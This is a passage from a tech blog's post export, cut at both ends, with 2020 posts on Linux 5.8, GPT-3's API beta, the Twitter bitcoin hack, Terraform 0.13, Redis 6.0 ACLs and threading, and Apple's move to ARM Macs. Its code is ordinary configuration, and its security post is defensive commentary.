The scale is impressive, but what impresses me more is the process that makes such large releases possible without compromising stability. The kernel development model — while sometimes messy and contentious — remains one of the most effective large-scale software engineering efforts in history.\nFor most developers and operators, the upgrade path is straightforward. Unless you\u0026rsquo;re running cutting-edge hardware or need specific features from 5.8, there\u0026rsquo;s no rush to upgrade — your distribution will pick it up in due course. But if you\u0026rsquo;re doing kernel development or contributing to the ecosystem, the size of this release is a reminder that there\u0026rsquo;s always room for more contributors. The kernel\u0026rsquo;s appetite for good patches is effectively unlimited.\nWhat I find most exciting is the continued investment in testing and debugging infrastructure. KCSAN, improved selftests, and better CI integration signal a project that\u0026rsquo;s taking code quality seriously at scale. In a codebase this large, that\u0026rsquo;s not just admirable — it\u0026rsquo;s essential.\n","date":"6 August 2020","externalUrl":null,"permalink":"/posts/200806-linux-kernel-5-8-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Linux 5.8 lands with a massive changeset. Linus Torvalds himself says it’s one of the biggest releases of all time — here’s what developers should care about.","title":"Linux 5.8 — Linus Calls It One of the Biggest Releases Ever","type":"posts"},{"content":"Over the past few weeks, my Twitter feed has been flooded with GPT-3 demos. Developers generating React components from plain English descriptions, writing SQL queries from natural language, even producing passable marketing copy — all through OpenAI\u0026rsquo;s new API that\u0026rsquo;s been rolling out in private beta since June. 
As I discussed in my initial look at the beta, and the broader language model that garnered significant attention earlier this year, these capabilities have been progressing rapidly. After thirty years in this industry, I\u0026rsquo;ve learned to be skeptical of hype cycles, but I have to admit: some of these demos are genuinely impressive.\nWhat Makes GPT-3 Different # GPT-3 is the third generation of OpenAI\u0026rsquo;s Generative Pre-trained Transformer model, and it\u0026rsquo;s a massive leap in scale. We\u0026rsquo;re talking about 175 billion parameters — that\u0026rsquo;s over 100 times larger than GPT-2, which itself was considered enormous when it launched last year. The model was trained on a diverse corpus of internet text, books, and other sources, giving it a remarkably broad understanding of language patterns. The emergence of this technology is reshaping developer expectations about what tools can do for AI-assisted development.\nWhat\u0026rsquo;s particularly interesting from an engineering perspective is the \u0026ldquo;few-shot learning\u0026rdquo; capability. Rather than fine-tuning the model for specific tasks (which was the standard approach with GPT-2 and BERT), you can simply provide GPT-3 with a few examples in your prompt, and it generalizes from there. This is a fundamental shift in how we interact with language models. You\u0026rsquo;re essentially programming with natural language, and the API makes this accessible to any developer who can make an HTTP request.\nThe API itself is clean and straightforward — you send a prompt, specify parameters like temperature and max tokens, and get back generated text. OpenAI has done a solid job making what is an incredibly complex system feel approachable. I\u0026rsquo;ve seen developers with no ML background building functional prototypes within hours of getting access.\nThe Demos Worth Paying Attention To # Among the flood of demos, a few stand out for their practical implications. 
Sharif Shameem\u0026rsquo;s layout generator takes a plain English description and produces JSX code — describing a button with specific styling and getting working React components back. It\u0026rsquo;s not perfect, but it\u0026rsquo;s remarkably close for a general-purpose language model.\nThere\u0026rsquo;s also the spreadsheet function generator, where you describe what you want a formula to do, and GPT-3 produces the correct Excel or Google Sheets formula. For anyone who\u0026rsquo;s spent time deciphering nested VLOOKUP statements, this feels like genuine progress.\nBut the demo that caught my engineering eye is code generation from docstrings. Write a Python function\u0026rsquo;s docstring describing what it should do, and GPT-3 fills in the implementation. It works for simple functions with surprising accuracy. For complex logic, it still falls short, but the trajectory here is clear.\nThe Limitations Nobody\u0026rsquo;s Tweeting About # Here\u0026rsquo;s where my decades of experience make me pump the brakes. GPT-3 is a statistical pattern matcher, not a reasoning engine. It generates text that looks correct based on patterns in its training data. This distinction matters enormously in production systems.\nThe model has no concept of factual accuracy. It will confidently generate plausible-sounding but completely wrong information. In a code generation context, it might produce syntactically valid code that has subtle logical errors — the kind that pass a code review but fail in production at 3 AM. I\u0026rsquo;ve seen enough \u0026ldquo;it works on my machine\u0026rdquo; situations to know that confident-looking output is sometimes the most dangerous kind.\nThere\u0026rsquo;s also the cost and latency question. Running inference on a 175-billion parameter model isn\u0026rsquo;t cheap, and the API reflects that. 
For anything beyond prototypes and demos, you need to think carefully about where this fits in your architecture and whether the cost-per-request makes sense for your use case.\nAnd then there\u0026rsquo;s the elephant in the room: bias. The model was trained on internet text, which means it has absorbed the biases present in that data. OpenAI acknowledges this, but for any production application, you\u0026rsquo;d need robust filtering and validation layers — adding complexity and cost.\nMy Take # I\u0026rsquo;m genuinely excited about GPT-3, but in a measured way. The technology is remarkable, and the API-first approach means developers can start experimenting immediately. But I\u0026rsquo;ve been through enough hype cycles — from expert systems in the \u0026rsquo;90s to blockchain in 2017 — to know that the gap between impressive demos and reliable production systems is wide.\nWhere I see real near-term value is in developer tooling: code completion, documentation generation, boilerplate scaffolding. These are contexts where a human is always in the loop to catch errors, and the cost of a mistake is low. Using GPT-3 to generate customer-facing content or make automated decisions? We\u0026rsquo;re not there yet, and anyone claiming otherwise hasn\u0026rsquo;t thought through the failure modes.\nThe bigger picture is what excites me most. GPT-3 demonstrates that scaling up language models produces emergent capabilities that weren\u0026rsquo;t present at smaller scales. The growing developer ecosystem around GPT-3 is exploring exactly these possibilities. If this trend continues — and there\u0026rsquo;s no reason to think it won\u0026rsquo;t — the next few years in AI could be transformative for how we build software.\nFor now, I\u0026rsquo;d recommend getting on the API waitlist if you haven\u0026rsquo;t already, and starting to think about where natural language interfaces could complement your existing tools. 
Just don\u0026rsquo;t bet your production architecture on it yet.\n","date":"30 July 2020","externalUrl":null,"permalink":"/posts/200730-gpt3-api-first-look/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s GPT-3 API is generating jaw-dropping demos across the developer community. Here’s what it means for the rest of us.","title":"GPT-3 — The API That Has Everyone Talking","type":"posts"},{"content":"Last week I got access to the GPT-3 API beta. Like many developers, I\u0026rsquo;d been watching the demos circulating on Twitter with a mixture of fascination and skepticism — GPT-3 generating working React components from natural language descriptions, writing SQL queries from plain English, and producing surprisingly coherent essays on arbitrary topics. The model itself had generated significant interest when the paper was published two months earlier. The demos looked almost too good. So I spent the past week testing it systematically, and I want to share what I\u0026rsquo;ve found beyond the cherry-picked screenshots.\nOpenAI is offering API access to several model sizes: davinci (the full 175 billion parameter model), curie, babbage, and ada (progressively smaller and faster). Most of the impressive demos use davinci. The API itself is straightforward — you send a text prompt and get a completion back. The magic, as it turns out, is entirely in how you construct the prompt.\nWhat Actually Works Well # Code generation from descriptions is genuinely useful, with caveats. I gave GPT-3 prompts like \u0026ldquo;Write a Python function that takes a list of dictionaries and returns a new list sorted by the \u0026lsquo;date\u0026rsquo; key in descending order\u0026rdquo; and consistently got working code back. For straightforward utility functions — string manipulation, data transformation, simple algorithms — it\u0026rsquo;s remarkably reliable.\nWhere it gets interesting is prompt engineering. 
If you provide a few examples of input-output pairs (what OpenAI calls \u0026ldquo;few-shot learning\u0026rdquo;), the accuracy improves dramatically. Instead of just describing what you want, you show the model two or three examples, and it extrapolates the pattern. For instance, show it three examples of a natural language query and the corresponding SQL, and it can generate SQL for a fourth query with surprising accuracy.\nText transformation is another strong suit. I\u0026rsquo;ve been using it to convert verbose documentation into concise summaries, reformat data between structures (JSON to YAML, XML to JSON), and generate documentation from code comments. These are tasks that are tedious for humans but well within GPT-3\u0026rsquo;s capabilities.\nNatural language interfaces feel more achievable now than they ever have. Building a system where users type \u0026ldquo;show me all orders from last month over $100 sorted by date\u0026rdquo; and the system translates that to a database query is no longer a research project — it\u0026rsquo;s an API call with some prompt engineering.\nWhere It Falls Down # Factual accuracy is a serious problem. GPT-3 generates plausible-sounding text that is frequently wrong. I asked it to explain specific library APIs, and it invented functions that don\u0026rsquo;t exist. I asked about historical events and got dates wrong. It confidently states incorrect information with the same tone it uses for correct information. There\u0026rsquo;s no uncertainty signal.\nThis isn\u0026rsquo;t a minor limitation — it fundamentally constrains the use cases. You cannot use GPT-3 as a knowledge base. You cannot trust its output without verification. For code generation, this means the generated code must be tested, not just skimmed. For text generation, every factual claim needs checking.\nConsistency over long outputs degrades. For short completions (a paragraph, a function), GPT-3 is coherent. 
For longer outputs, it starts to contradict itself, repeat phrases, or drift off-topic. The model has no persistent memory: each API call is stateless, and while you can include previous context in the prompt, you\u0026rsquo;re limited by the token window (currently 2048 tokens, shared between the prompt and the completion).\nCost is non-trivial. Davinci, the most capable model, costs $0.06 per 1,000 tokens (roughly 750 words). For interactive applications where each user query might consume 500-1000 tokens in prompt and completion, that works out to roughly 3 to 6 cents per query, which adds up quickly at any real volume. The smaller models are much cheaper but notably less capable. Finding the right model-cost trade-off for production use will be an engineering challenge.\nThe Prompt Engineering Discipline # What strikes me most about working with GPT-3 is that effective use requires a new skill that doesn\u0026rsquo;t map neatly onto existing engineering disciplines. Prompt engineering, the craft of shaping the input text to reliably produce the desired output, is part copywriting, part programming, and part empirical science.\nA naive prompt like \u0026ldquo;Write a Python web scraper\u0026rdquo; produces mediocre results. A well-crafted prompt that specifies the library to use, provides an example of the desired output format, and includes constraints (\u0026ldquo;handle pagination, use rate limiting, log errors to stderr\u0026rdquo;) produces dramatically better code. The difference between a good prompt and a bad one can be the difference between a useful tool and a party trick.\nI\u0026rsquo;ve started maintaining a library of effective prompts: templates for different tasks that I can adapt. This feels like the early days of SQL or regex: a skill that starts as arcane knowledge and gradually becomes a standard part of the developer toolkit.\nImplications for Software Development # I don\u0026rsquo;t think GPT-3 is going to replace developers. But I do think it\u0026rsquo;s going to change how we work. 
Here are the near-term applications I\u0026rsquo;m most excited about:\nCode scaffolding: generating boilerplate code, tests, and documentation from high-level descriptions. Not replacing the thinking, but eliminating the typing.\nInternal tools: building natural language interfaces for databases and APIs that non-technical team members can use without learning SQL or API syntax.\nData transformation: converting between formats, generating sample data, and building migration scripts from examples rather than specifications.\nLearning aid: explaining unfamiliar code, suggesting improvements, and answering \u0026ldquo;how do I do X in language Y\u0026rdquo; questions with working examples.\nMy Take # GPT-3 is the most impressive language model I\u0026rsquo;ve worked with, and it\u0026rsquo;s not close. The jump from GPT-2 to GPT-3 is qualitatively different — it\u0026rsquo;s not just better at the same tasks, it can do tasks that GPT-2 simply couldn\u0026rsquo;t.\nBut the hype is outrunning the reality. The Twitter demos showing GPT-3 building entire applications from a one-sentence description are cherry-picked best cases, and they omit the many failed attempts that preceded the screenshot-worthy success. In practice, GPT-3 is a powerful but unreliable tool that requires careful prompt design, output validation, and realistic expectations.\nThe API pricing also signals that this is a premium tool, not a utility. For high-value use cases where the cost per query is justified — code generation in an IDE, natural language database queries for business users, content summarization — GPT-3 can deliver real value today. For high-volume, low-margin applications, the economics don\u0026rsquo;t yet work.\nI\u0026rsquo;m going to keep experimenting. There\u0026rsquo;s something genuinely exciting about a tool that can understand and generate code and natural language with this level of fluency. 
But I\u0026rsquo;m keeping my expectations grounded in what I\u0026rsquo;ve actually tested, not what the demos promise. The broader implications of this technology and the emerging developer ecosystem will shape how we integrate AI into software development for years to come.\n","date":"23 July 2020","externalUrl":null,"permalink":"/posts/200723-gpt3-api-beta-first-impressions/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI is granting beta access to the GPT-3 API. After a week of experimentation, here’s what’s genuinely impressive and what’s overhyped.","title":"GPT-3 API Access — First Impressions from the Beta","type":"posts"},{"content":"Yesterday, Twitter experienced what is arguably the most high-profile security breach in social media history. The accounts of Barack Obama, Joe Biden, Elon Musk, Bill Gates, Apple, Uber, and dozens of other verified accounts simultaneously posted bitcoin scam messages promising to double any bitcoin sent to a specific address. Within hours, the scam wallet had received over $100,000 in bitcoin.\nTwitter\u0026rsquo;s response was extraordinary in its severity: they temporarily disabled the ability for all verified accounts to tweet. Think about that. One of the largest communication platforms on earth had to silence its most prominent users because they couldn\u0026rsquo;t trust their own internal access controls.\nThe details are still emerging, but what we know so far points to a social engineering attack that compromised Twitter\u0026rsquo;s internal admin tools. This wasn\u0026rsquo;t a sophisticated zero-day exploit. It was people being tricked into giving access to systems they shouldn\u0026rsquo;t have been able to reach in the first place.\nInternal Tools Are the Soft Underbelly # Every large technology company has internal admin tools — dashboards and APIs that let employees manage user accounts, investigate abuse reports, and handle customer support requests. 
These tools typically have far more power than any public API. At Twitter, the internal tools apparently allow staff to post tweets on behalf of any account, change associated email addresses, and disable two-factor authentication.\nThe existence of such tools isn\u0026rsquo;t surprising. Every platform at scale needs them. What\u0026rsquo;s concerning is the access model. The screenshots circulating on social media (before Twitter aggressively removed them) show an internal dashboard with remarkably broad capabilities and, apparently, insufficient access restrictions.\nIn a well-designed system, the principle of least privilege means that a customer support agent can view account details but not post tweets. A security investigator might be able to lock an account but not change its email. The ability to impersonate a user and post as them should require multiple approvals and be logged with extreme scrutiny.\nWhether Twitter\u0026rsquo;s tools had these controls and they were bypassed, or whether the controls didn\u0026rsquo;t exist, is the critical question. Neither answer is comforting.\nSocial Engineering Scales Better Than Exploits # The security industry spends billions on firewalls, intrusion detection systems, vulnerability scanners, and endpoint protection. These are all important. But the attack vector that consistently works — year after year, breach after breach — is convincing a human to do something they shouldn\u0026rsquo;t.\nSocial engineering attacks against employees are devastatingly effective because they exploit the gap between security policies and daily workflow. An employee who receives what appears to be a legitimate IT request to verify their credentials, especially when working from home during a pandemic and communicating primarily through Slack and email, is in a difficult position. 
The cues we rely on to detect deception — body language, familiar faces, physical presence — are absent in remote work.\nThis Twitter breach reportedly involved targeting a small number of Twitter employees, possibly through phone-based social engineering (vishing). The attackers didn\u0026rsquo;t need to find a buffer overflow or an unpatched server. They needed to find one person who would share credentials or perform an action on their internal system.\nThe Access Control Questions Every Company Should Ask # This incident should prompt every technology company to audit their internal tooling:\nWho can access admin tools? Not who should be able to, but who actually can right now. In my experience, the delta between these two lists is always larger than leadership expects. Permissions accumulate over time as people change roles, and revocation is rarely as prompt as provisioning.\nWhat can each access level do? Can a Tier 1 support agent perform the same actions as a senior security engineer? Are destructive or impersonation actions gated behind additional authentication?\nIs there a break-glass procedure? For truly sensitive actions — posting as a user, changing account recovery information, disabling 2FA — is there a multi-person approval requirement? Is there a tamper-evident audit log?\nHow are internal tools authenticated? Are they behind a VPN with MFA? Is the MFA phishing-resistant (hardware keys) or phishable (SMS/TOTP)? With the shift to remote work, many companies relaxed VPN requirements for internal tools. That decision has consequences.\nCan you detect anomalous internal tool usage? If someone uses the admin tool to modify 30 high-profile accounts in 20 minutes, does an alert fire? Or does that look like normal support activity?\nThe Bigger Implication # The bitcoin scam was, frankly, a low-ambition use of the access these attackers had. They could post as the former President of the United States. 
They could read the direct messages of politicians, journalists, executives, and activists. They could change the email addresses on accounts and lock out the real owners permanently.\nThat they used this access for a relatively crude cryptocurrency scam suggests either limited sophistication or limited imagination. A state-sponsored actor with the same access would have used it very differently, and we might never have known about it.\nThis is the thought that should keep security professionals up at night: how many breaches of internal tools have happened without anyone posting an obvious bitcoin scam that blew the cover? If the attackers had simply read DMs and exfiltrated data quietly, would Twitter have detected it?\nMy Take # The Twitter hack is a wake-up call, but I worry it\u0026rsquo;s one the industry will snooze through. We\u0026rsquo;ve had similar wake-up calls before: the 2019 Capital One breach (a misconfigured web application firewall that exposed AWS credentials), the 2018 Marriott breach (compromised internal Starwood systems), the 2017 Equifax breach (an unpatched Apache Struts vulnerability in an internet-facing web application). Each time, the industry nods solemnly, publishes blog posts about zero trust architecture, and then goes back to business as usual.\nWhat would actually help: mandatory hardware security keys for all employees with access to production systems. Behavioral analytics on internal tool usage. Mandatory multi-person approval for sensitive actions. Regular red-team exercises specifically targeting internal tools via social engineering.\nThese aren\u0026rsquo;t novel recommendations. They\u0026rsquo;re well-understood practices that most companies haven\u0026rsquo;t implemented because they\u0026rsquo;re expensive, they slow things down, and until something goes wrong, the risk feels theoretical.\nToday, for Twitter, it\u0026rsquo;s very real. 
Tomorrow, it could be anyone.\n","date":"16 July 2020","externalUrl":null,"permalink":"/posts/200716-twitter-bitcoin-hack-social-engineering/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The massive Twitter compromise that hit Barack Obama, Elon Musk, and Apple wasn’t a sophisticated zero-day — it was social engineering targeting internal tools. That’s the scary part.","title":"The Twitter Bitcoin Hack — A Social Engineering Masterclass","type":"posts"},{"content":"HashiCorp released the first beta of Terraform 0.13 this week, and the headline feature has been on the community\u0026rsquo;s wish list for years: count and for_each support at the module level. If you\u0026rsquo;ve been writing Terraform professionally, you know exactly why this matters. If you haven\u0026rsquo;t, let me explain why infrastructure teams are quietly celebrating.\nThe Module Iteration Problem # Since Terraform introduced modules — reusable packages of infrastructure configuration — there\u0026rsquo;s been one glaring limitation. You could use count and for_each to create multiple instances of a resource, but not of a module. This meant that if you had a well-crafted module for, say, a standard web application stack (load balancer, compute instances, database, DNS records), and you wanted to deploy three instances of it for three different services, you had to write:\nmodule \u0026#34;app_service_a\u0026#34; { source = \u0026#34;./modules/web-app\u0026#34; name = \u0026#34;service-a\u0026#34; # ... all the variables } module \u0026#34;app_service_b\u0026#34; { source = \u0026#34;./modules/web-app\u0026#34; name = \u0026#34;service-b\u0026#34; # ... all the same variables, copied } module \u0026#34;app_service_c\u0026#34; { source = \u0026#34;./modules/web-app\u0026#34; name = \u0026#34;service-c\u0026#34; # ... and again } This wasn\u0026rsquo;t just ugly — it was a maintenance nightmare. 
Every time the module\u0026rsquo;s interface changed, you had to update every copy. In large organizations with dozens or hundreds of similar deployments, this led to either massive code duplication or elaborate workarounds using terragrunt or code generation scripts.\nTerraform 0.13 fixes this cleanly:\nmodule \u0026#34;app\u0026#34; { source = \u0026#34;./modules/web-app\u0026#34; for_each = var.services name = each.key config = each.value } Three lines instead of thirty. And more importantly, adding a new service is a data change, not a code change. You add an entry to the services variable, and Terraform creates the entire stack.\nAutomatic Provider Installation # The second major change is how Terraform handles providers. In 0.12 and earlier, terraform init downloads providers from a monolithic namespace. All providers lived under hashicorp/ in the Terraform Registry, even community-maintained ones. This created confusion about ownership and support levels.\nTerraform 0.13 introduces a new provider source syntax that uses a full namespace:\nterraform { required_providers { aws = { source = \u0026#34;hashicorp/aws\u0026#34; version = \u0026#34;~\u0026gt; 3.0\u0026#34; } datadog = { source = \u0026#34;DataDog/datadog\u0026#34; version = \u0026#34;~\u0026gt; 2.12\u0026#34; } } } This is more than cosmetic. It enables a truly decentralized provider ecosystem where anyone can publish and maintain providers under their own namespace. Vendors can own their Terraform providers directly, publish updates on their own schedule, and maintain them without going through HashiCorp\u0026rsquo;s release process.\nFor teams that build internal providers — and I know several that do — this is significant. You can now host providers in a private registry and reference them with clear namespacing. 
No more confusion about whether terraform-provider-custom-thing is the official version or someone\u0026rsquo;s fork.\nCustom Validation Rules # A smaller but useful addition is custom validation rules for variables:\nvariable \u0026#34;instance_type\u0026#34; { type = string validation { condition = can(regex(\u0026#34;^t3\\\\.\u0026#34;, var.instance_type)) error_message = \u0026#34;Instance type must be from the t3 family for cost control.\u0026#34; } } This moves validation left — catching configuration errors at terraform plan time rather than at apply time (or worse, in production). I\u0026rsquo;ve seen teams build elaborate CI checks and wrapper scripts to validate Terraform variables. Having it built into the language is cleaner and more discoverable.\nThe validation rules support arbitrary conditions using Terraform\u0026rsquo;s expression language, so you can enforce naming conventions, restrict resource sizes, validate CIDR ranges, or any other policy that can be expressed as a boolean condition.\ndepends_on for Modules # Another long-requested feature: modules now support depends_on. In complex infrastructures, you sometimes need to ensure that one module completes before another starts, even when there\u0026rsquo;s no direct data dependency between them. A common example is a networking module that creates a VPC and a monitoring module that needs the VPC\u0026rsquo;s NAT gateway to be functional before it can reach external endpoints.\nPreviously, you\u0026rsquo;d create artificial data dependencies — passing an output from module A to a variable in module B that module B didn\u0026rsquo;t actually use, just to force ordering. 
It worked, but it was confusing for anyone reading the code later.\nNow you can express intent directly:\nmodule \u0026#34;monitoring\u0026#34; { source = \u0026#34;./modules/monitoring\u0026#34; depends_on = [module.networking] } The Upgrade Path # Terraform 0.13 includes an 0.13upgrade command that automatically rewrites your configuration files to use the new provider source syntax. In my testing, it handles straightforward configurations well. Complex setups with multiple provider aliases or unusual provider inheritance patterns may need manual attention.\nThe state format is also changing, which means you\u0026rsquo;ll need to run terraform state replace-provider for any existing state files. HashiCorp provides tooling for this, but it\u0026rsquo;s worth testing thoroughly in a non-production environment first. I\u0026rsquo;ve been bitten by state migration issues in previous Terraform upgrades, and a corrupted state file at 3 AM is nobody\u0026rsquo;s idea of a good time.\nMy Take # Terraform 0.13 addresses the most common complaints I hear from teams using Terraform at scale. Module iteration alone will eliminate thousands of lines of duplicated configuration across the industry. The provider namespace change sets up the ecosystem for sustainable growth. Custom validation rules reduce the need for external policy tools (though they don\u0026rsquo;t replace them — tools like Open Policy Agent still have a role for cross-resource and cross-module policies).\nIf you\u0026rsquo;re on Terraform 0.12, I\u0026rsquo;d recommend starting your upgrade planning now. Test with the beta, identify any breaking changes in your workflows, and plan a migration window. The features are worth the effort, and the longer you wait, the more state drift you\u0026rsquo;ll accumulate between your 0.12 and 0.13 configurations.\nInfrastructure as code keeps getting better. 
The gap between \u0026ldquo;configuration management\u0026rdquo; and \u0026ldquo;real programming language\u0026rdquo; continues to narrow, and that\u0026rsquo;s good for everyone who manages cloud infrastructure.\n","date":"9 July 2020","externalUrl":null,"permalink":"/posts/200709-terraform-013-module-foreach/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Terraform 0.13 brings count and for_each to modules, automatic provider installation, and custom validation rules. A look at what changes in practice.","title":"Terraform 0.13 — Module-Level For Each and the Provider Story","type":"posts"},{"content":"Redis 6.0 has been GA for a couple of months now, and I\u0026rsquo;ve been running it in production across three projects since the RC phase. The headline features — access control lists and I/O threading — sound like incremental improvements, but they represent a significant shift in how Redis positions itself for production workloads. After years of \u0026ldquo;just put it behind a firewall,\u0026rdquo; Redis is finally getting serious about security and scalability.\nACLs: Better Late Than Never # For the entire history of Redis up to version 5, security was essentially a single shared password set via requirepass. Every client that connected had full access to every command and every key. If your application needed Redis for caching and your analytics pipeline also needed Redis, they shared the same credentials and the same permission level. One misconfigured analytics job could FLUSHALL your production cache.\nThe community worked around this with network segmentation, separate Redis instances, and the rename-command directive (which is a hack, not a security model). But these workarounds don\u0026rsquo;t scale, and they don\u0026rsquo;t meet the compliance requirements that more enterprises are imposing on their infrastructure.\nRedis 6.0\u0026rsquo;s ACL system changes this fundamentally. 
You can now create named users with specific permissions:\nACL SETUSER analytics on \u0026gt;analytics_password ~analytics:* +get +set +del -flushall This creates a user analytics that can only access keys prefixed with analytics: and can only run GET, SET, and DEL — no FLUSHALL, no KEYS *, no DEBUG. This is basic stuff for a database, but for Redis, it\u0026rsquo;s transformative.\nI\u0026rsquo;ve been using ACLs to separate concerns in a multi-service architecture where different microservices access different key namespaces. The session service gets access to session:* keys. The rate limiter gets ratelimit:*. The cache layer gets cache:*. If a service is compromised, the blast radius is contained, a principle critical to defense-in-depth security.\nThe implementation is clean. ACLs can be defined in a file and loaded at startup, or managed dynamically via commands. There\u0026rsquo;s an ACL LOG that records denied operations, which is invaluable for debugging permission issues during rollout.\nI/O Threading: Understanding What It Actually Does # The threading story in Redis 6.0 is widely misunderstood. Redis is not becoming a multi-threaded database. The core command execution is still single-threaded — one thread processes commands sequentially, which is what gives Redis its consistency guarantees and simplicity.\nWhat is threaded now is I/O: reading data from client sockets and writing responses back. On a busy Redis instance handling tens of thousands of connections, the I/O overhead of parsing incoming commands and serializing responses can become a bottleneck before the CPU-bound command execution does. 
The I/O threads handle this parsing and serialization work in parallel, then hand off the parsed commands to the main thread for execution.\nIn my benchmarks, enabling I/O threads (I\u0026rsquo;m using 4 threads on an 8-core machine) improved throughput by roughly 40-60% for workloads that are heavy on small commands — think high-frequency GET/SET operations from many concurrent clients. For workloads dominated by large values or complex commands like ZUNIONSTORE, the improvement is smaller because the bottleneck is in command execution, not I/O.\nTo enable it, add to your redis.conf:\nio-threads 4 io-threads-do-reads yes A word of caution: don\u0026rsquo;t just set io-threads to your total CPU count. The main execution thread still needs a core, and you want headroom for background tasks like RDB persistence and AOF rewriting. I\u0026rsquo;ve found that setting I/O threads to roughly half your available cores gives the best results.\nTLS Native Support # Redis 6.0 also adds native TLS support, which eliminates the need for stunnel or other TLS proxies in front of Redis. This is another \u0026ldquo;finally\u0026rdquo; feature. Running Redis without encryption in transit has been a persistent compliance headache, and the stunnel workaround adds latency and operational complexity.\nEnabling TLS is straightforward:\ntls-port 6380 tls-cert-file /path/to/redis.crt tls-key-file /path/to/redis.key tls-ca-cert-file /path/to/ca.crt The performance overhead of TLS is measurable — expect roughly 10-15% lower throughput compared to plaintext connections. But in most real-world deployments, the network round-trip time dwarfs the TLS overhead, so the practical impact is small.\nClient-Side Caching with Tracking # A less-discussed but potentially impactful feature is client-side caching support via the new CLIENT TRACKING mechanism. Redis can now notify clients when keys they\u0026rsquo;ve previously read have been modified. 
This enables clients to maintain a local cache of frequently-read values and invalidate them precisely when they change, rather than polling or using short TTLs.\nThis is particularly useful for read-heavy workloads where the same keys are read thousands of times per second. Instead of hitting Redis for every read, the client reads from local memory and only queries Redis when notified of a change. In theory, this can reduce Redis load dramatically for certain access patterns.\nI haven\u0026rsquo;t deployed this in production yet — client library support is still catching up — but I\u0026rsquo;m watching the Lettuce (Java) and redis-py implementations closely.\nMy Take # Redis 6.0 is the most significant Redis release in years, not because any single feature is groundbreaking, but because the collection of features moves Redis from \u0026ldquo;fast cache that you protect with network rules\u0026rdquo; to \u0026ldquo;production-grade data store with real security and better scalability.\u0026rdquo;\nIf you\u0026rsquo;re still running Redis 5.x, the upgrade path is smooth. The new features are all opt-in — ACLs default to a default user with full access (backward compatible), I/O threading is disabled by default, and TLS requires explicit configuration. There\u0026rsquo;s very little risk in upgrading, and the ACL support alone justifies the effort.\nThe Redis ecosystem continues to impress me with its balance of simplicity and capability. In an industry that loves to pile on complexity, Redis\u0026rsquo;s commitment to doing a few things extremely well remains refreshing.\n","date":"2 July 2020","externalUrl":null,"permalink":"/posts/200702-redis-6-acls-threading-production/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Redis 6.0 brings ACLs and I/O threading to the world’s most popular in-memory data store. 
Here’s what the changes mean in practice.","title":"Redis 6.0 in Production — ACLs, Threading, and What Actually Matters","type":"posts"},{"content":"On Monday, Apple announced what many of us had been expecting but hoping wouldn\u0026rsquo;t happen quite yet: the Mac is moving from Intel to Apple\u0026rsquo;s own ARM-based silicon. The transition starts later this year with the first Apple Silicon Macs, and Apple expects the full lineup to make the switch within two years. This follows ARM\u0026rsquo;s success in mobile and emerging adoption in cloud infrastructure.\nI\u0026rsquo;ve been through platform transitions before. I was around for the 68k to PowerPC move, and I was very much in the thick of things during the PowerPC to Intel switch in 2005. Each time, Apple managed to pull it off more smoothly than anyone predicted. But this one feels different in scale and implication, especially for those of us who build developer tools and server-side software.\nThe Technical Foundation # Apple\u0026rsquo;s A-series chips in the iPhone and iPad have been embarrassingly fast for years now. The A12Z in the current iPad Pro already rivals many laptop-class Intel chips in single-threaded performance while sipping power. The Developer Transition Kit Apple is shipping — a Mac Mini with an A12Z — isn\u0026rsquo;t even the final silicon. It\u0026rsquo;s a teaser.\nThe architectural advantages of ARM are well-documented: better performance per watt, tighter integration between CPU, GPU, and neural engine, and a unified memory architecture that eliminates the overhead of copying data between CPU and GPU memory pools. For machine learning workloads, image processing, and video encoding, the gains should be substantial.\nWhat interests me more is what this means for the instruction set story. x86 has accumulated decades of backwards-compatibility baggage. 
ARM\u0026rsquo;s RISC architecture is cleaner, and Apple has the luxury of designing their chips for a single operating system. They don\u0026rsquo;t have to accommodate the weird edge cases that Intel deals with to keep ancient Windows software running.\nRosetta 2 and the Translation Layer # Apple demonstrated Rosetta 2, the translation layer that will run existing x86 Mac apps on ARM. They showed Tomb Raider running through translation at what appeared to be playable frame rates, and they demonstrated Microsoft Office running without modification.\nI\u0026rsquo;m cautiously optimistic here. The original Rosetta during the PowerPC-to-Intel transition worked better than anyone expected, but it wasn\u0026rsquo;t free — there was a measurable performance penalty, and some apps had subtle bugs. The new Rosetta has an advantage: it can do ahead-of-time translation at install time, not just JIT translation at runtime. That should help significantly with sustained workloads.\nBut here\u0026rsquo;s my concern: developer toolchains. If you\u0026rsquo;re running Docker, compiling large C++ projects, or using tools like Vagrant and VirtualBox, the transition gets complicated fast. Docker containers are built for specific architectures. You can\u0026rsquo;t just run an x86 Linux container on ARM without an emulation layer, and emulation layers for container workloads are slow.\nWhat Developers Should Do Now # If you\u0026rsquo;re a web developer working primarily in JavaScript, Python, or Ruby, your transition will probably be smooth. The interpreters and runtimes will be ported — Node.js, Python, and Ruby all run on ARM Linux already, so the macOS ARM ports should follow quickly.\nIf you\u0026rsquo;re doing systems programming in C, C++, or Rust, you\u0026rsquo;ll want to get a Developer Transition Kit and start cross-compiling. The LLVM toolchain already has excellent ARM support, so Clang and Rust\u0026rsquo;s compiler should produce native ARM binaries without drama. 
GCC will follow.\nIf you rely heavily on Docker for local development — and in 2020, most of us do — this is where I\u0026rsquo;d focus my attention. Docker has been running on ARM (Raspberry Pi, AWS Graviton) for a while, but the ecosystem of pre-built images is overwhelmingly x86. You\u0026rsquo;ll either need ARM-native images or you\u0026rsquo;ll be running through QEMU emulation, which is functional but not fast.\nMy immediate advice: start building multi-architecture Docker images now. Use docker buildx to create images that work on both amd64 and arm64. Even if you\u0026rsquo;re not planning to buy an ARM Mac on day one, multi-arch images are good practice — they\u0026rsquo;ll work on AWS Graviton instances too, which are often cheaper than their x86 equivalents.\nThe Virtualization Question # One area that\u0026rsquo;s genuinely uncertain is virtualization. VirtualBox doesn\u0026rsquo;t support ARM. VMware and Parallels will need new hypervisors. Running Windows on an ARM Mac will require the ARM version of Windows, which Microsoft has been developing for mobile platforms.\nFor developers who need to test on Windows or run Linux VMs locally, this could be a real pain point during the transition period. Apple announced a new virtualization framework, but details are thin. We\u0026rsquo;ll need to see how VMware and Parallels respond.\nI suspect that within 18 months, the virtualization story will be 